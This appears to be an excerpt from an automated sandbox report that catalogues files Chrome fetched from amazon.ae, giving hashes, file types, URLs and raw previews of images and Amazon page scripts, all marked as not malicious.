                                                                                                                                                                                                        SSDEEP:768:kzZ6QexaNOF3QrJ9FL0PD+MtOxKjizJRiaLaeW0VofOCMpqfVO0aU3APeKRlqMir:kPe4O1RPD+k8W0E4qo0yeY/iDogyZS
                                                                                                                                                                                                        MD5:F467A8043189BE8253E63864BECDFEC1
                                                                                                                                                                                                        SHA1:657D4F54B62346FC45765E9DDF558AAD95C40368
                                                                                                                                                                                                        SHA-256:2DFA2C991A88BCFA1052671A06FB6F2619637CCB5FB3A7345FF97E5DF244E592
                                                                                                                                                                                                        SHA-512:6303642D244EC687CA1C6667359AEC5D3DEE5A225C14A8A5CDEE630A14424EBD0116CE2F023CDA46EE3122EC9485D21741AA4A4AD3A93A51C554641AE0ABCCEF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(()=>{const e=e=>e+"_Feedback";class t{async addSponsoredLabelWithFeedbackLink(e,t){e.appendChildTo(this.parentHtmlId,this);const a=await t.getSponsoredLabelAndFeedbackLink(this.urlPathAndParameter);if(!(null==a?void 0:a.isOk()))throw new Error(`Result from the feedback service was not ok ${this.urlPathAndParameter}`);e.updateElement(this.getHtmlId(),a)}getHtmlId(){return e(this.parentHtmlId)}isHidden(){return this.hidden}exists(e){return e.exists(this.getHtmlId())}constructor(e,t,a,n,i,r,s){this.parentHtmlId=e,this.feedbackStyle=t,this.labelText=a,this.labelStyle=n,this.position=i,this.urlPathAndParameter=r,this.hidden=s}}class a{open(e){e.clickChildLink(this)}getHtmlId(){return e(this.parentHtmlId)}constructor(e){this.parentHtmlId=e}}var n=function(e){console.debug(e)},i=function(e,t){console.error(e),r("ERROR",e,s(e,t))},r=function(e,t,a){var n;null===(n=window.ueLogError)||void 0===n||n.call(window,a,{logLevel:e,attribution:"APE-safeframe",message:t+" | "})},s=function(e,t){return
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12378
                                                                                                                                                                                                        Entropy (8bit):7.906298624082549
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:KLdPr+x6wMESGehV6E12cqd6wpC6HTd6ba6VJ5C/g4ZDsgHSRFdyfPCWn:KLvwFSGykE12gwP6u6H0/glcSNyfKWn
                                                                                                                                                                                                        MD5:635C1F9BCA0B6682A9629D23A2499BEC
                                                                                                                                                                                                        SHA1:28FED44220A01C59E5F980E893CED147EE52AEFF
                                                                                                                                                                                                        SHA-256:586888B085A99F4997B188A26E1E8B0D5687CB3B819626E7FABC7F31CB73AF2D
                                                                                                                                                                                                        SHA-512:F386C41CB94700D83715E16E09FF90D2FE2CBA95189C0278F59B00F7A19C6188FF014B7B0547D94DC390DFC80ACC1F81CD48F2E7CF534B75E2ED8BCA838F56C3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31+4pNVeyCL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................,..........................................G ..............[...i.0..S.K...Q....O.W.v.9..Bc.. .....:.;..t\v..m..v2.........Z....z..?E~id#...W..........?!fpl..%...U.9b.<.5...76.?y.=.)....7r.E...k..."9.]...t.+F.g.1v......W..W2.3./~....X...........1...`.:1..6d8.6..LY{..~o....2.E......)"#.hHa.".......0:....$R..o=d{.....0.......1.,a.sX,.e..G.?B|6}1..GP.....,U...E...K....)a#.h.b.......0Z..FzH.*...].wT..g@.........b.-..f.c-....xk.,....DQI..2BG...L.2..C,U..@C.q.QU.vwvq..v.F3.QQU..e;.....@............O7..h.Z...C\UDU.Q.q.C$$QI...3...RDQ...pM..RDS.q.Z]ZF.R.u..UG.WV.FO....g..:........>c.q...7..kqiQE\E....RDG...C,$x\../.".d............n......q.x+...2......f.........7.8~k..............:.(.H......g......)a....(...9#.....&...q.y.%.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3410
                                                                                                                                                                                                        Entropy (8bit):7.619193594074733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0woVXYqDnuE31/pQ0buynj4C83HGA1ym07lfZaQm7ErWGqRCDuGB5z:TboVdy4BQ1eJ83B1ym8fNdrWBRCayz
                                                                                                                                                                                                        MD5:7E787FAF1EB722AD0DA17F9A6F33A0B5
                                                                                                                                                                                                        SHA1:E1E7576526CA7B6E2F6C1E652322E17633055192
                                                                                                                                                                                                        SHA-256:0B0DEC14A9777B5377EB99C6B2B4CDF3B15DEFCE1267513F5B1F505AFCE2F936
                                                                                                                                                                                                        SHA-512:777230B55EE93D0D3A8A14FF038F5074488D8ED7D6A2FFB8141602668409C3D273D51DF50B453BF2882CB50609F6A65883F370F581EAA2A583B775646091E8E9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31Id2i6D-rL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`.......................................u...F!'Q.I.b.u...F!'Q.I.b......!.7.Q.7/..tsm...^e......M..C.M".|..y...a..5..g.j}..t..2.T].....1.\.?....p...7..X.........h[U...`..^U.\.L...=Zu,4.|.k.<I..R......9.@..7...J/..2....X..^..v.;n|.3...g........_i.M...Y...*......w.zG-.?#.._Iy....Jt..r..h..E....9.k`.c.7.it...m...g..B........7U.J....*..k+!....:.............)7.hT.5.y.D.W-..<.......&F..`.'.5....m...L.....1Q#...O.1..c1..v=3#..t...................................................*.............................014.. !A2p#............X.qX..3.l.6.sl.6.sl.6.sl.6.sl.6.sl.6.sl.6.sl.6.a.U.:.C.KW.Wo..D%.?.PR).S.]9..d....@m..M.F.#G....**.:..NX.b.*..>...s9.[.....:.....%.lX....M._.....T._...1.....U.^!....#.....}}.u.ovT...b9.{d.{$../..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8724
                                                                                                                                                                                                        Entropy (8bit):7.761883753720958
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:1Wjw/yUNf5ll2HDuQ6V71Jc/sQQN1DvyVGRYfErc9AMFvj0GIqs1:6GmaQi5eQbRY0c9cGIqk
                                                                                                                                                                                                        MD5:7A6C54F0AC32E2B191446B619031115F
                                                                                                                                                                                                        SHA1:72F98CDDE0225D2BAA6B49F6423C9DEA69C8F483
                                                                                                                                                                                                        SHA-256:2582D182D6FA8247E2D35FDC2A92A6CDA8D98121770861C8C33FB571365CD1E9
                                                                                                                                                                                                        SHA-512:9AD1A9703931983793686829614E6AC7448768B08B2C2420FDF83463FE6EF4B5EE7EFCEDC9F196B4696811887F34B2AD0CD09DA2B310E9C81338EEB5FE175B51
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31ihwTsvbBL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................................................................................................................................................................j..".~u..4.}b..\.e........l.7...-..%8l/5.......Q}..j..'..).....8.............L.Z=]..Im.{|...A.>;.6...N...{-.......T5..T.o%.g*.'.j..|..&.#.3.*....F..V.z.z"................G.1..@..p...}M.........C......wT.T.Qxl..N....eb.U~*[...V...".Hd.%..P..........9...............^.&.5N;>.....R.fJ.......2....N..Z..!..he.9...........J5.63+.F.m..&..=..=.~9H.............]...w...?..'Bg.u....wm9.7Yr.YMb:.p.E;6...=...gey...y6....-....6.....7.0..t/>t..2.9..............k...z..I[]ZLrOZ.O\.uO8.8z.I..U..}.....^...=.....0..H..+...+.9....f.r...........0?..u...4.....K.Ir?]r?X.x.?...{..$jCM.Y.]....,...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 154x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8633
                                                                                                                                                                                                        Entropy (8bit):7.952737671643566
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:uZ9ZW8nHZyvMiBpKZ3tlhEzS2+R9+RJV4rtJZf:UrJHQvnBpKxLbARgrt/f
                                                                                                                                                                                                        MD5:E113F185D38E0B25CA978445F7627960
                                                                                                                                                                                                        SHA1:1C41221EB4DE3064B81EF3DF17040048EED99B36
                                                                                                                                                                                                        SHA-256:AD2F18835CF9CC99652F9A836DD29346287DCFA8CC2CCEAC2D24441950C22F0E
                                                                                                                                                                                                        SHA-512:08E9634A14CAFB0C4D4C6EE553E22F0EC172C3350D28AF87D4D574FA9FA6D4BB0BC984679B10C890240DB40A75B6FF20AA948B74F4EACB6259F87CB03B9ADA06
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..Qa."Aq.2BR.....#br......3S...CDds.$&4......................................................!1.AQ."2aq...B3b....#R...............?..tQE.E.QB.E.P.U.Y.I..ZX....>......Y .=...Z....7.q...k"^...W.k./2..BQKmh.o..E..l+...HH..n~$.~Ox..j-....\.~.7.Q....}.q.)..........h..D.:...s}....~E.Yo...o....W.....G.>.G.n...'D.o{.`.;..`..{.o.5|...I...d...9..#...w..s.L...u...;{B.....s...l.Tvf.Ew4.l......&..:..=..VZ...NW..L).ki.@.H.`._w,.#\-..V`.R..j.+..(....(.."...1[.ZM......k.J.....y..X...$#...pQd.i..\..A........s...[.-]...0*a-..e.....+D...0....;.,WM..1....qe..Igl{...u......q=9t..U.1>C.d.....p.....K.........r..eK..a........i2[...kK.CN.....^,I.-...M...;..I.%..A..Os".!o.v.*..qN...)g...Y]...$........T...f1...|).......v.<.....l..u@....wA.O.Y...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 149x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6233
                                                                                                                                                                                                        Entropy (8bit):7.940586856196309
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TWe8zjfmZ6MCl+7uxyKuQl+faQxNjey0uvjlxKT58bJ/p6Y/xshGRy4ZXya:SPnMCI7u9uA3QR0uBA+b1s8TXya
                                                                                                                                                                                                        MD5:DDB4416DE1284A59B794AC6E6C21C98C
                                                                                                                                                                                                        SHA1:6D83C8D210024582CC34589FD51A5FE4F81F158B
                                                                                                                                                                                                        SHA-256:129ACA17DBC4F604CB5291120F4EDBCFA15D07A0789639B7016BAC4D2FC33BEE
                                                                                                                                                                                                        SHA-512:28863BA8484042068A5FF0D1511C0C5CE227308D61270CD43B8994BA607BFDA09FEA30161BF2299524F576755BDF6E229B4887A55A5049EEEDF69FA61211F4A2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61hmx6dffrL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1.."A..Qa#qu.....%346BRt...2Cbcdr....S.....$&e..................................................!1A..Qa"..............?..zG...]*'..l .....I..r...>.z.[.nZ.1q..?4.....w...:^'....n@!...y....Q.K.*....~,............Q....k...(=..nM....3..#.^..xp...6..'....Ao1.0..W...h..J...r3.,.L.@.L...X.6.i.E.gC.$.]C...k#.x.......$......g..0.Ez.V.pGun.g-..O1.k7.F.;........$....a..,..8.....W..S5........c.,u...S..B...I......=Cy.U..+.c.C.y&0.9.z..}....y4.#..U...H..=.8.....Rq...}.....x..8.'<..G.'$s.$..@.@...K*........y.;6.;..+..0O<`...H..0....N6.....%...1.(=..+.'..9..(..Y...P.G..`..!..t....g...c.y..g'.A.~...D.7...R...1....w."...$...;w}...q?C..7.H..M.?.!m...%..r{_\.z7.j...Ws.o`..z.......E6..?.e......~X3m.(...=......n=Rh.u0....^GwM.6T.g..ya.}.R..Y.G....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3774
                                                                                                                                                                                                        Entropy (8bit):7.842388980917137
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T5LjwwwwwwwwwwLdw0ivbZujYHSzKN8QRe/:ZjwwwwwwwwwwLdwvbZujYHSkde/
                                                                                                                                                                                                        MD5:830D978812395595F5E80095569C7D99
                                                                                                                                                                                                        SHA1:7CB10BE5D34CDDDAA2F745346CE450819B0FC3B4
                                                                                                                                                                                                        SHA-256:3238E33A13D50BA14E288BE5E7F96C3F7BC0F3E208B1469C5ED320CE7FE6E2F3
                                                                                                                                                                                                        SHA-512:42E5DEB7F0A242A4E9D8809A2A0128F8EF606D905E200CE562E254C2A12011E844073AE06314ADD8EEC393AD3A3B5072C1EE496CA62FA7269E26CFD1C61FBEDA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_2022_mena_mobilemania_qc-372x232-product-badge-3lpvr-noc3q_372x232_ae-en._SY116_CB608574218_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!1.".#3ASs...2QaB.$Cbq....D..........................................!.1A.Q...............?.......&4.i.......|4...Koe....5.>./..B.)..i./..>./..B.)..i./..>./..B.)..i./..>./..B.)..i./..>./..B.)..i./..>./..B.)..i./..>./..B.)..i./..>./..B.)..i./..>./..B.)..i./..>./..B.)..i./..>./..B.)..i./..6......*j...C...EM@.)@.+.T...4....X..A.........5..m|>...Pv.9...S$.;..*..r_..!...zC.u.k..kW...E.....d.."....r....m......O....I..c...w...,.*UA`].../w.~ ..J....<).2,.....B..&./W.Ub...Q.....Cw0o.rFA.H8N...Z.m..<..N...X.$...=w...F.+.*.....f........ .,a.............bb.]v....b...Xe+...Kep......1at...I...#..H.t....-.....5N..t.._l];.b..Q.`>..\. ...O%_.W..2..h:..c..d......G.v...N..W.V................6......*j...C...EM@.)A....C....$.;..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (510)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):902
                                                                                                                                                                                                        Entropy (8bit):5.205086466616489
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2WZ/P3eAiarnyCFTjd6odi0Gx9g934jcASoN:RzryitFi0Gtn
                                                                                                                                                                                                        MD5:B33E102C16865CE9C5CBA2438083AE0A
                                                                                                                                                                                                        SHA1:9CAC174A6773DE9D3E22D1CA5423ACB03B497656
                                                                                                                                                                                                        SHA-256:A473A5AAC16EDC54CA599F6AF7D8A92BC6148748BA61AD9F265377194E419FF0
                                                                                                                                                                                                        SHA-512:DFB77B5CB9DA20A84219D68EBFC8CC3112D506AF8D8BC2839FFA846360053560CC054737FEF7CE2F5D07EA279254A1A7761A6598934345DB8A377FBAABCDAA3D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01aXEwSGkvL.js?AUIClients/AmazonAPIRichContentBuzzAssets
                                                                                                                                                                                                        Preview:(function(b){var d=window.AmazonUIPageJS||window.P,e=d._namespace||d.attributeErrors,a=e?e("AmazonAPIRichContentBuzzAssets",""):d;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,d,e){b.when("jQuery").register("count-down-controller",function(a){return{countDown:function(b){var c=a(b),d=new Date(Date.UTC(c.data("year"),c.data("month")-1,c.data("day"),c.data("hour"),c.data("minute"),c.data("second"),0)),e=null;e=setInterval(function(){var a=d-Date.now(),b=Math.floor(a/.1E3);if(0>b)c.text("00:00"),clearInterval(e);else{a=Math.floor(b/3600%24);var f=Math.floor(b%60);b=("0"+Math.floor(b/60%60)).slice(-2);f=("0"+f).slice(-2);a=0<a?[a,b,f].join(":"):[b,f].join(":");c.text(a)}},1E3)}}});b.when("A","count-down-controller","ready").execute(function(a,b){var c=document.querySelectorAll(".amazon-api-rc-count-down-timer");a.each(c,function(a){b.countDown(a)})})});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4260
                                                                                                                                                                                                        Entropy (8bit):7.742053010550002
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TA2RCiS71uzLqvbFdHWz3nL6k3FQmBUB3yGefE9tDhTiEn:c5BMfiFYzeMQHgZfEzwEn
                                                                                                                                                                                                        MD5:5FBA5B30EC249C1073EDACB1AA73AC42
                                                                                                                                                                                                        SHA1:EA3E568DA1498965FFDB0F2D4F409BDD7B8D3780
                                                                                                                                                                                                        SHA-256:A21D09441B72F734DE0406F551DC2C5CB44D75F458D2D7445662132D283C2A0C
                                                                                                                                                                                                        SHA-512:2DB26BCA167DB8D5839F14CED6BE34A8F0F9EBEF9CE7C57E2506675737A7ABAC4307C3FB348EF49CAB3D27AD9D3F77610722AE34EB451ECA2CCD463C3DE45A5B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31iocnwzJSL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........0.............................................................X.........................X.Q...&q.........$....;h5...}.......:7....W..._.d.z.|..7W.c.a..H............y...:.:I2:..q.=......)...!....q/c....}$...........}.^..LX.+..p.S..&.|.K\..,....1._E.....O.}..<!..;p.......L8>m..SI..y..$..w..;.g[!....T....)..5.z.0..:...r.Df..1...V...u...../@.......u.bE.2qr.5RSb..A/.[.]..W-...e,3.........8...#96..Zs80i..2...u....f.............a.#..~q...i.\6....;z...u[)..."]...r......fQ.5..-y*.U.4..$....l!Y...w0...:....sB..@.......@....@.............?...-.........................1.. "0.!2A.#@QBD`p.............."U.k<....)2U.Dq-o......w.N...%..eOl.)b.^.}.......LE..*8....QK..m...5I_.;l...,..i....H..........:..T.f..R9.G5H......K....\...s.t<v.....o'...d.M.FR.i..A.......[.O..._...lR..<..wU.~Q..Fr......ek
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.848287570294709
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:UglPKcxAd2UD3eHvFWmFIwVa:hlfcD3eP5FVo
                                                                                                                                                                                                        MD5:B4D14A5A7DED2B7E8B61FFDF0D27C6AC
                                                                                                                                                                                                        SHA1:76129547B66AFA304FAE22701B3353F82AE027AB
                                                                                                                                                                                                        SHA-256:2997E47CEA9CE1DC60305874F04D973D8A1C85E2A64EF235D1078B2587EB6984
                                                                                                                                                                                                        SHA-512:DFC427EE8AE3F810D111120C54E866AACFD40E26BF92D4037307AE0FC1A507F5161CCBA61D995A0CEC7E892BEDD2A179E6FD5E7F25B12FD3A5A86FB5CB409110
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01hxt8miXyL.css?AUIClients/SmxCartAssets
                                                                                                                                                                                                        Preview:#priceCallOutDisplayText .currencyINR{background-position:-32px -333px}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26ctb%3D1%26sc0%3Dp13n-rvi_desktop-rvi_0%26bb0%3D3006%26be0%3D3007%26pc0%3D4067%26ld0%3D4067%26t0%3D1723729112047%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:4067
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3037
                                                                                                                                                                                                        Entropy (8bit):7.840477974313932
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6qt5s3HZtXpCFbYmfucMmKF11P7EO/04b4ie5N2GZKQjiPhJOioMdTRyN66i:TPXrUxY9cMmKn1bkBKQ0hnTRy48OEA
                                                                                                                                                                                                        MD5:688053036FDDD99E9515D729DE121EDF
                                                                                                                                                                                                        SHA1:D5C54011D60D2B432B34DADA1DEF5E703A6CA91A
                                                                                                                                                                                                        SHA-256:9AF70D901B448C5722909D91E020B43623F5EEFB35C47AA65C6797D57A0D3C5E
                                                                                                                                                                                                        SHA-512:47BFCA8E81064456F585D87EA5110FD9934D58DB6F535396042C47571281CE50BEE998753B4A7CB625780520E06126980006A2CE7F9FC23466A3827D44F6C853
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1A..Q"2a...q....#BRr.3CDST.....b...................................................!..Q."1R...3Aaq..................?.."'.>.V""....]..H*%e.Dd..D...+2.F.7....1"...=.8..S6K..z..".+.....'.....#0..._U..qISL.........2.B.*..T.....x*......'.)*%%D.e...X.Q)+... ^5.z...3.p.h. .oiH=H...W.^(.o.....e.Z-Z..H..f..[{z..4....j.e.Q..A.......+W.x.... ..O...W..8v.../..w..A._.......Y.>.....=...n......6.eCv...Z..I4v.....*i4K...;g2.u..3#...U..'..Kv......K..I....NqK.;.m*l.~<.."g~o5`]bV.b...+.uu....v..o..W=.rL.a,.Q.Gv.5..t(..I..q-......e.g...........y.J.0.zD@2""..IYIY..B""...l...S.=DV....A.y.7..E..'.Y.g....>../....7..X........B..3kL..BP......T9ncS..#VG....%.n.=.O-W:.....$.v..?yo.i..C...|...xM......v..@.A.8.....,p'.Z}*..N..(.>..fV.[..).y..Z%.5y...%:-]..!...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (14498)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):616629
                                                                                                                                                                                                        Entropy (8bit):5.730965089313223
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:D9f/mRI3iJJBG9XAYjhtigz2SnCgcS//je/tI/1HGJQVvLUbRUTGF5:d/zXoI/ZOUY
                                                                                                                                                                                                        MD5:17649F980DD8A2ECB970B9D07FF5CDB8
                                                                                                                                                                                                        SHA1:BB725B91B85F099DCC51FA8F494078DEBFA3C440
                                                                                                                                                                                                        SHA-256:8E5EE3B3FD0AC25E5D28126494FCA1C6C83F90197B316311AC994610D26C5BEA
                                                                                                                                                                                                        SHA-512:0FF82CCB43193DCAD72242996081995CAADCBA547CBCAB78F903F666493C6DCCC104EACE01EED8B27935FCCD63D1F96DECFC3AE878F4BF7AFE985D53BE450D5D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/b/?_encoding=UTF8&node=30082653031&pd_rd_w=PvPUB&content-id=amzn1.sym.e610e695-61bf-4b64-9f77-57dba86777d6&pf_rd_p=e610e695-61bf-4b64-9f77-57dba86777d6&pf_rd_r=1GXSAVZ7MBDVTNT0VYNB&pd_rd_wg=BEf2n&pd_rd_r=10ff52dc-63aa-4adb-9a14-21011bc538fc&ref_=pd_hp_d_hero_unk
